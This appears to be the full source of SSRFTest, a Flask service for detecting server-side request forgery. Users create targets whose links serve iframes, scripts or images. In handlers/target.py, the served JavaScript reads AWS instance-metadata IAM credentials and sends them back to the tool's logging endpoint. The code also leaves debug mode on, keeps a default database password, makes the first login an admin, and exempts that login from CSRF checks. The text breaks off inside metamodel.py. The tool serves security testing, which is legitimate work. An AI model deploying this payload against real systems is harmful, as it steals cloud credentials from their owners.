├── handlers ├── __init__.py ├── index.py ├── dashboard.py ├── auth.py └── target.py ├── prestart.sh ├── run-debug.sh ├── static └── favicon.png ├── templates ├── index.html ├── dashboard │ ├── index.html │ └── newTarget.html ├── auth │ ├── login.html │ └── register.html ├── target │ └── index.html └── base.html ├── dbrepl.py ├── Dockerfile ├── uwsgi.ini ├── requirements.txt ├── docker-compose.yml ├── readme.md ├── license.txt ├── model.py ├── main.py ├── handler.py └── metamodel.py /handlers/__init__.py: -------------------------------------------------------------------------------- 1 | import index, auth, dashboard, target 2 | -------------------------------------------------------------------------------- /prestart.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sysctl -w net.core.somaxconn=65536 4 | -------------------------------------------------------------------------------- /run-debug.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | FLASK_ENV=development python main.py -------------------------------------------------------------------------------- /static/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/daeken/SSRFTest/HEAD/static/favicon.png -------------------------------------------------------------------------------- /templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block scripts %} 3 | {% endblock %} 4 | {% block body %} 5 |

SSRFTest

6 |

Blah blah blah

7 | {% endblock %} 8 | -------------------------------------------------------------------------------- /dbrepl.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python -i 2 | from metamodel import createLocalSession 3 | from main import app 4 | app.test_request_context('/').__enter__() 5 | createLocalSession() 6 | from model import * 7 | -------------------------------------------------------------------------------- /handlers/index.py: -------------------------------------------------------------------------------- 1 | from handler import * 2 | 3 | @handler('index', authed=False) 4 | def get_index(): 5 | if session.user is not None: 6 | redirect(handler.dashboard.get_index) 7 | return dict(page='home') 8 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tiangolo/uwsgi-nginx-flask:python2.7 2 | 3 | WORKDIR /app 4 | 5 | ADD requirements.txt /app/ 6 | 7 | RUN pip install --trusted-host pypi.python.org -r requirements.txt 8 | 9 | ADD . /app 10 | -------------------------------------------------------------------------------- /uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | module = main 3 | callable = app 4 | listen = 16384 5 | lazy-apps = true 6 | master = true 7 | processes = 100 8 | max-requests = 1000 9 | logto = /var/log/uwsgi.log 10 | harakiri = 45 11 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | bcrypt==3.1.4 2 | certifi==2018.4.16 3 | cffi==1.11.5 4 | chardet==3.0.4 5 | click==6.7 6 | Flask==1.0.2 7 | idna==2.7 8 | itsdangerous==0.24 9 | Jinja2==2.10 10 | MarkupSafe==1.0 11 | pycparser==2.18 12 | six==1.11.0 13 | SQLAlchemy==1.2.10 14 | urllib3==1.23 15 | Werkzeug==0.14.1 16 | psycopg2 17 | flask-cors 18 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.1' 2 | 3 | services: 4 | db: 5 | image: postgres 6 | restart: always 7 | environment: 8 | POSTGRES_PASSWORD: dbpassword 9 | volumes: 10 | - db-data:/var/lib/postgresql/data 11 | 12 | web: 13 | privileged: true 14 | image: ssrfweb 15 | restart: always 16 | ports: 17 | - 80:80 18 | 19 | volumes: 20 | db-data: 21 | -------------------------------------------------------------------------------- /templates/dashboard/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block body %} 3 | New Target 4 | {% if len(targets) %} 5 | 6 | 7 | 8 | 9 | 10 | {% for (link, name, lastHit) in targets %} 11 | 12 | {% endfor %} 13 | 14 |
NameLast Hit
{{ name }}{{ lastHit }}
15 | {% endif %} 16 | {% endblock %} -------------------------------------------------------------------------------- /templates/dashboard/newTarget.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block body %} 3 | {% if error %} 4 |
{{ error }}
5 | {% endif %} 6 |

New Target

7 |
$CSRF$ 8 |
9 | 10 |
11 | 12 |
13 |
14 | 15 |
16 | {% endblock %} -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | Welcome to SSRFTest 2 | =================== 3 | 4 | Installation 5 | ------------ 6 | 7 | 1. Clone the repo 8 | 2. Generate a random 64-byte ASCII string (I typically just run `import random; ''.join('%02x' % random.randrange(256) for i in xrange(32))` at the Python interpreter) 9 | 3. Put that string into main.py on the line `app.secret_key = key = 'SECRET HERE'` 10 | 4. (Optional) Change the database password in docker-compose.yml and model.py -- default is `dbpassword`. This is not exposed to the outside so it's largely irrelevant 11 | 5. Search for `ssrftest.com` and replace it with the IP/domain you're hosting this on 12 | 6. Install Docker and Docker Compose 13 | 7. Run `./build-docker.sh` 14 | 8. Run `docker-compose up` 15 | 9. ??? 16 | 10. Profit 17 | -------------------------------------------------------------------------------- /templates/auth/login.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block body %} 3 | {% if error %} 4 |
{{ error }}
5 | {% endif %} 6 |
7 |

Log in

8 |
$CSRF$ 9 |
10 | 11 |
12 | 13 |
14 |
15 |
16 | 17 |
18 | 19 |
20 |
21 | 22 |
23 |
24 | {% endblock %} -------------------------------------------------------------------------------- /license.txt: -------------------------------------------------------------------------------- 1 | Copyright 2019 Cody Brocious 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 4 | 5 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 6 | 7 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. -------------------------------------------------------------------------------- /handlers/dashboard.py: -------------------------------------------------------------------------------- 1 | from handler import * 2 | 3 | errors = [ 4 | 'Target name required', 5 | 'You have a target with this name already' 6 | ] 7 | 8 | linkchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_' 9 | 10 | @handler('dashboard/index') 11 | def get_index(): 12 | return dict(page='home', targets=[ 13 | (target.link, target.name, sorted(hit.at for hit in target.hits)[-1] if len(target.hits) else None) 14 | for target in session.user.targets 15 | ]) 16 | 17 | @handler('dashboard/newTarget') 18 | def get_newTarget(error=None): 19 | return dict(error=errors[int(error)] if error is not None else None) 20 | 21 | @handler 22 | def post_newTarget(name): 23 | if name is None or name.strip() == '': 24 | redirect(get_newTarget.url(error=0)) 25 | elif Target.one(user_id=session.user.id, name=name): 26 | redirect(get_newTarget.url(error=1)) 27 | while True: 28 | link = ''.join(linkchars[random.randrange(len(linkchars))] for i in xrange(5)) 29 | if Target.one(link=link) is None: 30 | break 31 | Target.add(session.user, link, name) 32 | redirect(handler.target.get_index.url(link=link)) 33 | -------------------------------------------------------------------------------- /templates/target/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block body %} 3 |

{{ name }}

4 |

Hit Link:

5 |

IFrame:

6 |

Script:

7 |

Image:

8 | {% if len(logs) %} 9 |

Log Messages

10 | 11 | 12 | 13 | 14 | 15 | {% for (at, message) in logs %} 16 | 17 | {% endfor %} 18 | 19 |
DateMessage
{{ at }}
{{ message }}
20 | {% endif %} 21 | {% if len(hits) %} 22 |

Hits

23 | 24 | 25 | 26 | 27 | 28 | {% for (at, req) in hits %} 29 | 30 | {% endfor %} 31 | 32 |
DateRequest
{{ at }}
{{ req }}
33 | {% endif %} 34 | {% endblock %} 35 | -------------------------------------------------------------------------------- /templates/auth/register.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block body %} 3 | {% if error %} 4 |
{{ error }}
5 | {% endif %} 6 |
7 |

Register

8 |
$CSRF$ 9 |
10 | 11 |
12 | 13 |
14 |
15 |
16 | 17 |
18 | 19 |
20 |
21 |
22 | 23 |
24 | 25 |
26 |
27 |
28 | 29 |
30 | 31 |
32 |
33 | 34 |
35 |
36 | {% endblock %} 37 | -------------------------------------------------------------------------------- /handlers/auth.py: -------------------------------------------------------------------------------- 1 | from handler import * 2 | import bcrypt, random 3 | 4 | errors = [ 5 | 'You must be logged in to view that page', 6 | 'Username or email in use', 7 | 'Password too short', 8 | 'Passwords do not match', 9 | 'Invalid username or password' 10 | ] 11 | 12 | @handler('auth/login', authed=False) 13 | def get_index(error=None): 14 | if session.user is not None: 15 | redirect(handler.index.get_index) 16 | return dict(page='login', error=errors[int(error)] if error is not None else None) 17 | 18 | @handler(authed=False) 19 | def get_logout(): 20 | del session['userId'] 21 | redirect('/') 22 | 23 | @handler('auth/register', authed=False) 24 | def get_register(error=None): 25 | if session.user is not None: 26 | redirect(handler.index.get_index) 27 | return dict(page='register', error=errors[int(error)] if error is not None else None) 28 | 29 | @handler(authed=False) 30 | def post_register(username, password, password2, email): 31 | if session.user is not None: 32 | redirect(handler.index.get_index) 33 | if User.one(username=username) or User.one(email=email): 34 | redirect(get_register.url(error=1)) 35 | elif len(password) < 8: 36 | redirect(get_register.url(error=2)) 37 | elif password != password2: 38 | redirect(get_register.url(error=3)) 39 | 40 | user = User.add(username, password, email, False) 41 | session['userId'] = user.id 42 | redirect(handler.index.get_index) 43 | 44 | @handler(authed=False, CSRFable=True) 45 | def post_login(username, password): 46 | if session.user is not None: 47 | redirect(handler.index.get_index) 48 | user = User.find(username, password) 49 | 50 | if user == None: 51 | redirect(get_index.url(error=4)) 52 | else: 53 | session['userId'] = user.id 54 | 55 | redirect(handler.index.get_index) 56 | -------------------------------------------------------------------------------- /handlers/target.py: -------------------------------------------------------------------------------- 1 | from handler import * 2 | 3 | @handler('target/index') 4 | def get_index(link): 5 | if link is None: 6 | return 'Fail' 7 | target = Target.one(user_id=session.user.id, link=link) 8 | if target is None: 9 | return 'Unknown link' 10 | return dict( 11 | name=target.name, 12 | logs=[(log.at, log.message) for log in target.logs[::-1]], 13 | hits=[(hit.at, hit.request) for hit in target.hits[::-1]] 14 | ) 15 | 16 | js = '''function log(data) { 17 | var sreq = new XMLHttpRequest(); 18 | sreq.open('GET', 'http://ssrftest.com/target/log?link=LINK&data=' + encodeURI(data), true); 19 | sreq.send(); 20 | } 21 | 22 | function get(url) { 23 | try { 24 | var req = new XMLHttpRequest(); 25 | req.open('GET', url, false); 26 | req.send(null); 27 | if(req.status == 200) 28 | return req.responseText; 29 | } catch(err) { 30 | } 31 | return null; 32 | } 33 | 34 | log('Triggered in ' + window.location.href); 35 | var role = get('http://169.254.169.254/latest/meta-data/iam/security-credentials/'); 36 | if(role !== null) { 37 | log('Fetched AWS role: ' + role); 38 | log('With AWS credentials: ' + get('http://169.254.169.254/latest/meta-data/iam/security-credentials/' + role)); 39 | } else 40 | log('Failed to get AWS role'); 41 | ''' 42 | 43 | def hit(link, ext, req): 44 | if link is None: 45 | return 'Fail' 46 | target = Target.one(link=link) 47 | if target is None: 48 | return 'Unknown link' 49 | Hit.add(target, req) 50 | 51 | if ext == 'js': 52 | return Response(js.replace('LINK', link), mimetype='application/javascript') 53 | return Response('' % link, mimetype='text/html') 54 | 55 | @handler(authed=False) 56 | def get_log(link, data): 57 | if link is None: 58 | return 'Fail' 59 | target = Target.one(link=link) 60 | if target is None: 61 | return 'Unknown link' 62 | Log.add(target, data) 63 | return '' 64 | -------------------------------------------------------------------------------- /templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SSRFTest 6 | 7 | 8 | 9 | {% block scripts %} 10 | {% endblock %} 11 | 12 | 13 |
14 | 34 |
35 | 36 |
37 | {% block body %} 38 | {% endblock %} 39 | 40 |
41 | 42 | 45 |
46 | 47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /model.py: -------------------------------------------------------------------------------- 1 | import math, hashlib, json, os, random 2 | from datetime import datetime, timedelta 3 | import sqlalchemy as sa 4 | from sqlalchemy.orm import relationship 5 | from sqlalchemy.types import * 6 | from metamodel import * 7 | import bcrypt 8 | 9 | @Model 10 | def Log(): 11 | target_id = ForeignKey(Integer, 'Target.id') 12 | message = Unicode(65536) 13 | at = DateTime 14 | 15 | @staticmethod 16 | def add(target, data): 17 | with transact: 18 | return Log.create( 19 | target_id=target.id, 20 | message=data, 21 | at=datetime.now() 22 | ) 23 | 24 | @Model 25 | def Hit(): 26 | target_id = ForeignKey(Integer, 'Target.id') 27 | request = Unicode(65536) 28 | at = DateTime 29 | 30 | @staticmethod 31 | def add(target, request): 32 | with transact: 33 | return Hit.create( 34 | target_id=target.id, 35 | request=request, 36 | at=datetime.now() 37 | ) 38 | 39 | @Model 40 | def Target(): 41 | user_id = ForeignKey(Integer, 'User.id') 42 | enabled = Boolean 43 | link = String(5) 44 | name = Unicode 45 | 46 | logs = Log.relation(backref='target') 47 | hits = Hit.relation(backref='target') 48 | 49 | @staticmethod 50 | def add(user, link, name): 51 | with transact: 52 | return Target.create( 53 | enabled=True, 54 | user_id=user.id, 55 | link=link, 56 | name=name 57 | ) 58 | 59 | @Model 60 | def User(): 61 | enabled = Boolean 62 | admin = Boolean 63 | username = Unicode(255) 64 | password = String(88) 65 | email = String 66 | registrationDate = DateTime 67 | 68 | targets = Target.relation(backref='user') 69 | 70 | def setPassword(self, password): 71 | with transact: 72 | self.password = User.hash(password) 73 | 74 | @staticmethod 75 | def hash(password): 76 | return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt(12)) 77 | 78 | @staticmethod 79 | def checkHash(hash, password): 80 | try: 81 | hash = hash.encode('utf-8') 82 | return bcrypt.hashpw(password.encode('utf-8'), hash) == hash 83 | except: 84 | return False 85 | 86 | @staticmethod 87 | def add(username, password, email, admin): 88 | if User.one(enabled=True, username=username) or User.one(enabled=True, email=email): 89 | return None 90 | with transact: 91 | return User.create( 92 | enabled=True, 93 | username=username, 94 | password=User.hash(password), 95 | email=email, 96 | admin=admin, 97 | registrationDate=datetime.now() 98 | ) 99 | 100 | @staticmethod 101 | def find(username, password): 102 | if username == None or password == None: 103 | return None 104 | user = User.one(enabled=True, username=username) 105 | if user and User.checkHash(user.password, password): 106 | return user 107 | if not user and len(User.all()) == 0: 108 | return User.add(username, password, 'admin@admin', True) 109 | return None 110 | 111 | db = 'postgresql://postgres:dbpassword@db/postgres' 112 | 113 | @setup(db) 114 | def init(): 115 | pass 116 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import os 2 | from flask import Flask, request 3 | from flask_cors import CORS 4 | from werkzeug.routing import Rule 5 | import handler 6 | import handlers 7 | from handlers import * 8 | from metamodel import createLocalSession, closeLocalSession 9 | 10 | app = Flask(__name__) 11 | CORS(app, resources={r'/x/*': {'origins' : '*'}, r'/target/log': {'origins' : '*'}}) 12 | app.debug = True 13 | app.secret_key = key = 'SECRET HERE' 14 | app.config.update( 15 | SESSION_COOKIE_NAME='__Host-session', 16 | SESSION_COOKIE_SECURE=True, 17 | SESSION_COOKIE_HTTPONLY=True, 18 | SESSION_COOKIE_SAMESITE='Lax' 19 | ) 20 | 21 | @app.teardown_request 22 | def session_clear(exception=None): 23 | if not hasattr(request, '_session'): 24 | return 25 | request._session.remove() 26 | if exception and request._session.is_active: 27 | request._session.rollback() 28 | 29 | def reroute(noId, withId): 30 | def sub(id=None, *args, **kwargs): 31 | try: 32 | if id == None: 33 | return noId(*args, **kwargs) 34 | else: 35 | return withId(id, *args, **kwargs) 36 | except: 37 | import traceback 38 | traceback.print_exc() 39 | sub.func_name = '__reroute_' + noId.func_name 40 | return sub 41 | 42 | for module, sub in handler.all.items(): 43 | for name, (method, args, rpc, (noId, withId)) in sub.items(): 44 | if module == 'index': 45 | route = '/' 46 | trailing = True 47 | else: 48 | route = '/%s' % module 49 | trailing = False 50 | if name != 'index': 51 | if not trailing: 52 | route += '/' 53 | route += '%s' % name 54 | trailing = False 55 | 56 | if noId != None and withId != None: 57 | func = reroute(noId, withId) 58 | elif noId != None: 59 | func = noId 60 | else: 61 | func = withId 62 | 63 | if withId != None: 64 | iroute = route 65 | if not trailing: 66 | iroute += '/' 67 | iroute += '' 68 | app.route(iroute, methods=[method])(func) 69 | 70 | if noId != None: 71 | app.route(route, methods=[method])(func) 72 | 73 | @app.route('/favicon.ico') 74 | def favicon(): 75 | return app.send_static_file('favicon.png') 76 | @app.route('/css/') 77 | @app.route('/fonts/') 78 | @app.route('/img/') 79 | @app.route('/js/') 80 | @app.route('/js//') 81 | def staticfiles(fn, dir=None): 82 | if '..' in fn or (dir is not None and '..' in dir): 83 | return 'There is only one god and his name is Directory Traversal. And there is only one thing we say to Directory Traversal: "Not today."' 84 | return app.send_static_file(request.path[1:]) 85 | 86 | rpcStubTemplate = '''%s: function(%s, callback) { 87 | $.ajax(%r, 88 | { 89 | success: function(data) { 90 | if(callback !== undefined) 91 | callback(data) 92 | }, 93 | error: function() { 94 | if(callback !== undefined) 95 | callback() 96 | }, 97 | dataType: 'json', 98 | data: {csrf: $csrf, %s}, 99 | type: 'POST' 100 | } 101 | ) 102 | }''' 103 | cachedRpc = None 104 | @app.route('/rpc.js') 105 | def rpc(): 106 | global cachedRpc 107 | if cachedRpc: 108 | return cachedRpc 109 | 110 | modules = [] 111 | for module, sub in handler.all.items(): 112 | module = [module] 113 | for name, (method, args, rpc, funcs) in sub.items(): 114 | if not rpc: 115 | continue 116 | func = funcs[0] if funcs[0] else funcs[1] 117 | name = name[4:] 118 | method = rpcStubTemplate % ( 119 | name, ', '.join(args), 120 | func.url(), 121 | ', '.join('%s: %s' % (arg, arg) for arg in args) 122 | ) 123 | module.append(method) 124 | if len(module) > 1: 125 | modules.append(module) 126 | 127 | cachedRpc = 'var $rpc = {%s};' % (', '.join('%s: {%s}' % (module[0], ', '.join(module[1:])) for module in modules)) 128 | return cachedRpc 129 | 130 | @app.route('/scripts/') 131 | def script(fn): 132 | try: 133 | if not fn.endswith('.js'): 134 | return '' 135 | 136 | fn = 'scripts/' + fn[:-3] 137 | if os.path.exists(fn + '.js'): 138 | return file(fn + '.js', 'rb').read() 139 | return '' 140 | except: 141 | import traceback 142 | traceback.print_exc() 143 | 144 | app.url_map.add(Rule('/x/', endpoint='hit')) 145 | 146 | @app.endpoint('hit') 147 | def hit(link): 148 | if '.' in link: 149 | link, ext = link.split('.', 1) 150 | else: 151 | ext = '' 152 | 153 | req = '%s %s HTTP/1.1\r\n' % (request.method, request.url) 154 | for k, v in request.headers: 155 | req += '%s: %s\r\n' % (k, v) 156 | req += '\r\n' 157 | req += request.get_data() 158 | 159 | createLocalSession() 160 | try: 161 | ret = handlers.target.hit(link, ext, req) 162 | except: 163 | closeLocalSession(True) 164 | raise 165 | else: 166 | closeLocalSession(False) 167 | return ret 168 | 169 | if __name__=='__main__': 170 | app.run(host='') 171 | -------------------------------------------------------------------------------- /handler.py: -------------------------------------------------------------------------------- 1 | import os 2 | from json import dumps 3 | from flask import abort, make_response, render_template, request, session, Response 4 | from flask import redirect as _redirect 5 | from werkzeug.exceptions import HTTPException 6 | from urllib import quote, urlencode 7 | from datetime import datetime, timedelta 8 | from metamodel import createLocalSession, closeLocalSession 9 | from model import * 10 | 11 | class DictObject(dict): 12 | pass 13 | 14 | class StrObject(str): 15 | pass 16 | 17 | all = {} 18 | 19 | def handler(_tpl=None, _json=False, CSRFable=False, authed=True, admin=False): 20 | def sub(func): 21 | ofunc = func 22 | while hasattr(func, '__delegated__'): 23 | func = func.__delegated__ 24 | sofunc = func 25 | 26 | name = func.func_name 27 | rpc = False 28 | stpl = _tpl 29 | json = _json 30 | if name.startswith('get_'): 31 | name = name[4:] 32 | method = 'GET' 33 | elif name.startswith('post_'): 34 | method = 'POST' 35 | elif name.startswith('rpc_'): 36 | method = 'POST' 37 | rpc = json = True 38 | stpl = None 39 | else: 40 | raise Exception('All handlers must be marked get_, post_, or rpc_.') 41 | 42 | module = func.__module__.split('.')[-1] 43 | if not module in all: 44 | all[module] = DictObject() 45 | setattr(handler, module, all[module]) 46 | args = func.__code__.co_varnames[:func.__code__.co_argcount] 47 | hasId = len(args) > 0 and args[0] == 'id' and not rpc 48 | 49 | def func(id=None): 50 | createLocalSession() 51 | try: 52 | tpl = stpl 53 | if 'csrf' not in session: 54 | token = os.urandom(16) 55 | session['csrf'] = ''.join('%02x' % ord(c) for c in token) 56 | if not CSRFable and method == 'POST' and \ 57 | ('csrf' not in request.form or request.form['csrf'] != session['csrf']): 58 | abort(403) 59 | if 'userId' in session and session['userId']: 60 | session.user = User.one(id=int(session['userId'])) 61 | else: 62 | session.user = None 63 | if admin and (session.user == None or not session.user.admin): 64 | return abort(404) 65 | elif authed and session.user == None: 66 | return _redirect(handler.auth.get_index.url(error=0)) 67 | params = request.form if method == 'POST' else request.args 68 | kwargs = {} 69 | for i, arg in enumerate(args): 70 | if i == 0 and arg == 'id' and not rpc: 71 | continue 72 | if arg in params: 73 | kwargs[arg] = params[arg] 74 | elif arg in request.files: 75 | kwargs[arg] = request.files[arg] 76 | else: 77 | assert not rpc # RPC requires all arguments. 78 | 79 | try: 80 | if hasId and id != None: 81 | ret = ofunc(int(id), **kwargs) 82 | else: 83 | ret = ofunc(**kwargs) 84 | except RedirectException, r: 85 | return _redirect(r.url) 86 | except TemplateException, t: 87 | tpl = t.tpl 88 | ret = t.args 89 | if json: 90 | ret = dumps(ret) 91 | elif tpl != None: 92 | if isinstance(ret, str) or isinstance(ret, unicode): 93 | return ret 94 | if ret == None: 95 | ret = {} 96 | sret = ret 97 | ret = kwargs 98 | ret['handler'] = handler 99 | ret['request'] = request 100 | ret['session'] = session 101 | ret['len'] = len 102 | ret['int'] = int 103 | ret['float'] = float 104 | ret.update(sret) 105 | ret = render_template(tpl + '.html', **ret) 106 | csrf = '' % session['csrf'] 107 | ret = ret.replace('$CSRF$', csrf) 108 | 109 | ret = make_response(ret, 200) 110 | if hasattr(request, '_headers'): 111 | for k, v in request._headers.items(): 112 | ret.headers[k] = v 113 | ret.headers['X-Frame-Options'] = 'sameorigin' 114 | except: 115 | closeLocalSession(True) 116 | raise 117 | else: 118 | closeLocalSession(False) 119 | return ret 120 | 121 | func.func_name = '__%s__%s__' % (module, name) 122 | 123 | def url(_id=None, **kwargs): 124 | if module == 'index': 125 | url = '/' 126 | trailing = True 127 | else: 128 | url = '/%s' % module 129 | trailing = False 130 | if name != 'index': 131 | if not trailing: 132 | url += '/' 133 | url += '%s' % name 134 | trailing = False 135 | if _id != None: 136 | if not trailing: 137 | url += '/' 138 | url += quote(str(_id)) 139 | if len(kwargs): 140 | url += '?' 141 | url += urlencode(dict((k, str(v)) for k, v in kwargs.items())) 142 | return url 143 | 144 | ustr = StrObject(url()) 145 | ustr.__call__ = ofunc 146 | ustr.url = url 147 | func.url = url 148 | if not name in all[module]: 149 | all[module][name] = method, args, rpc, [None, None] 150 | if hasId and not rpc: 151 | all[module][name][3][1] = func 152 | else: 153 | all[module][name][3][0] = func 154 | setattr(all[module], sofunc.func_name, ustr) 155 | return ustr 156 | 157 | if _tpl != None and hasattr(_tpl, '__call__'): 158 | func = _tpl 159 | _tpl = None 160 | return sub(func) 161 | return sub 162 | 163 | def sessid(): 164 | if 'sessid' not in session: 165 | token = os.urandom(8) 166 | session['sessid'] = ''.join('%02x' % ord(c) for c in token) 167 | return session['sessid'] 168 | handler.sessid = sessid 169 | 170 | def header(key, value): 171 | if not hasattr(request, '_headers'): 172 | request._headers = {} 173 | 174 | request._headers[key] = value 175 | handler.header = header 176 | 177 | class RedirectException(Exception): 178 | def __init__(self, url): 179 | self.url = url 180 | 181 | def redirect(url, _id=None, **kwargs): 182 | if hasattr(url, '__call__') and hasattr(url, 'url'): 183 | url = url.url(_id, **kwargs) 184 | print 'Redirecting to', url 185 | raise RedirectException(url) 186 | 187 | class TemplateException(Exception): 188 | def __init__(self, tpl, args): 189 | self.tpl, self.args = tpl, args 190 | 191 | def templatize(tpl, **args): 192 | raise TemplateException(tpl, args) 193 | -------------------------------------------------------------------------------- /metamodel.py: -------------------------------------------------------------------------------- 1 | import sqlalchemy as sa 2 | from sqlalchemy import orm 3 | from sqlalchemy.types import Integer 4 | from sqlalchemy.sql.type_api import TypeEngine 5 | from sqlalchemy.orm import scoped_session, sessionmaker 6 | from sqlalchemy.orm.attributes import QueryableAttribute 7 | from flask import request 8 | import sys 9 | 10 | class SessionProxy(object): 11 | def __getattr__(self, name): 12 | return getattr(request._session, name) 13 | 14 | def __enter__(self): 15 | if not hasattr(request, '_inTransact'): 16 | request._inTransact = 0 17 | request._inTransact += 1 18 | 19 | def __exit__(self, type, value, traceback): 20 | request._inTransact -= 1 21 | if request._inTransact > 0: 22 | if type != None: 23 | raise 24 | return 25 | if type == None: 26 | try: 27 | request._session.commit() 28 | except: 29 | request._session.rollback() 30 | raise 31 | else: 32 | request._session.rollback() 33 | raise 34 | 35 | def createLocalSession(): 36 | request._session = scoped_session(sessionmaker()) 37 | request._session.configure(bind=engine) 38 | 39 | def closeLocalSession(didExcept): 40 | request._session.remove() 41 | if didExcept and request._session.is_active: 42 | request._session.rollback() 43 | 44 | transact = SessionProxy() 45 | metadata = sa.MetaData() 46 | 47 | # Monkey patched into Model-decorated classes 48 | @classmethod 49 | def relation(cls, *args, **kwargs): 50 | return orm.relation(cls, *args, **kwargs) 51 | 52 | 53 | @classmethod 54 | def create(cls, **kwargs): 55 | with transact: 56 | obj = cls() 57 | for k, v in kwargs.items(): 58 | setattr(obj, k, v) 59 | transact.add(obj) 60 | return obj 61 | 62 | 63 | def update(self, **kwargs): 64 | for k, v in kwargs.items(): 65 | setattr(self, k, v) 66 | return self 67 | 68 | 69 | @classmethod 70 | def all(cls): 71 | retry = 10 72 | while retry: 73 | try: 74 | with transact: 75 | return transact.query(cls).all() 76 | except: 77 | retry -= 1 78 | 79 | 80 | def genFilter(cls, kwargs): 81 | if len(kwargs) == 1: 82 | k, v = kwargs.items()[0] 83 | return getattr(cls, k) == v 84 | 85 | filters = [] 86 | for k, v in kwargs.items(): 87 | filters.append(getattr(cls, k) == v) 88 | return sa.and_(*filters) 89 | 90 | 91 | @classmethod 92 | def some(cls, **kwargs): 93 | retry = 10 94 | while retry: 95 | try: 96 | with transact: 97 | filter = genFilter(cls, kwargs) 98 | return transact.query(cls).filter(filter).all() 99 | except: 100 | retry -= 1 101 | 102 | @classmethod 103 | def one(cls, **kwargs): 104 | retry = 10 105 | while retry: 106 | try: 107 | with transact: 108 | filter = genFilter(cls, kwargs) 109 | return transact.query(cls).filter(filter).one() 110 | except: 111 | retry -= 1 112 | 113 | 114 | def Model(func): 115 | cframe = [None] 116 | def trace(frame, event, arg): 117 | if cframe[0] is None: 118 | cframe[0] = frame 119 | sys.settrace(trace) 120 | func() 121 | sys.settrace(None) 122 | 123 | frame = cframe[0] 124 | names = list(func.func_code.co_varnames) 125 | elems = {name : frame.f_locals[name] for name in names} 126 | 127 | cls = type(func.__name__, (object, ), elems) 128 | cls._fields = names 129 | cls.create = create 130 | cls.update = update 131 | cls.all = all 132 | cls.some = some 133 | cls.one = one 134 | cls.relation = relation 135 | Model.classes.append(cls) 136 | return cls 137 | Model.classes = [] 138 | 139 | engine = None 140 | 141 | 142 | def setup(db): 143 | global engine 144 | engine = sa.create_engine(db, client_encoding='utf8') 145 | metadata.bind = engine 146 | 147 | initialized = False 148 | 149 | for model in Model.classes: 150 | name = model.__name__ 151 | params = [] 152 | for field in dir(model): 153 | value = getattr(model, field) 154 | if isinstance(value, PrimaryKey): 155 | params = [field] + params 156 | else: 157 | params.append(field) 158 | 159 | columns = [] 160 | columns.append(sa.Column('id', Integer, primary_key=True)) 161 | relations = {} 162 | for field in params: 163 | value = getattr(model, field) 164 | if isinstance(value, Modifier): 165 | columns.append(value.build(field)) 166 | delattr(model, field) 167 | elif (isinstance(value, type) or isinstance(value, TypeEngine)) and field != '__class__': 168 | columns.append(sa.Column(field, value)) 169 | delattr(model, field) 170 | elif isinstance(value, orm.properties.RelationshipProperty): 171 | relations[field] = value 172 | delattr(model, field) 173 | elif field in model._fields: 174 | model._fields.remove(field) 175 | 176 | table = sa.Table(name, metadata, *columns) 177 | orm.mapper(model, table, properties=relations) 178 | if table.exists(): 179 | initialized = True 180 | 181 | metadata.create_all() 182 | 183 | def sub(func): 184 | if not initialized: 185 | func() 186 | 187 | return sub 188 | 189 | 190 | class Modifier(object): 191 | pass 192 | 193 | 194 | class PrimaryKey(Modifier): 195 | def __init__(self, type): 196 | self.type = type 197 | 198 | def build(self, name): 199 | return sa.Column(name, self.type, primary_key=True) 200 | 201 | 202 | class ForeignKey(Modifier): 203 | def __init__(self, type, ref, *args, **kwargs): 204 | self.type, self.ref = type, ref 205 | self.args, self.kwargs = args, kwargs 206 | 207 | def build(self, name): 208 | return sa.Column(name, self.type, sa.ForeignKey(self.ref), *self.args, **self.kwargs) 209 | 210 | 211 | class Nullable(Modifier): 212 | def __init__(self, type, *args, **kwargs): 213 | self.type = type 214 | self.args, self.kwargs = args, kwargs 215 | 216 | def build(self, name): 217 | return sa.Column(name, self.type, nullable=True, *self.args, **self.kwargs) 218 | 219 | 220 | class Unique(Modifier): 221 | def __init__(self, type, *args, **kwargs): 222 | self.type = type 223 | self.args, self.kwargs = args, kwargs 224 | 225 | def build(self, name): 226 | return sa.Column(name, 